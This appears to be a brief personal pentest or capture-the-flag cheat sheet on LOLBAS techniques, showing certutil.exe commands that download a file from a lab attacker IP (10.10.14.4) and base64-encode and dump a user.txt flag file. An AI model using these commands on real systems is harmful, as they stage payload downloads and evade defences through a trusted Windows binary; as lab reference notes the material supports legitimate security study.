######
LOLBAS
######

| https://lolbas-project.github.io/

|

********
Download
********

certutil.exe
************

.. code-block:: powershell

    C:\Windows\System32\certutil.exe -urlcache -split -f http://10.10.14.4/test.txt c:\users\tom\test.txt

|

****
Read
****

certutil.exe
************

.. code-block:: powershell

    C:\Windows\System32\certutil.exe -encode c:\users\tom\desktop\user.txt c:\users\tom\desktop\user.txt.base64
    C:\Windows\System32\certutil.exe -dump c:\users\tom\desktop\user.txt.base64

|
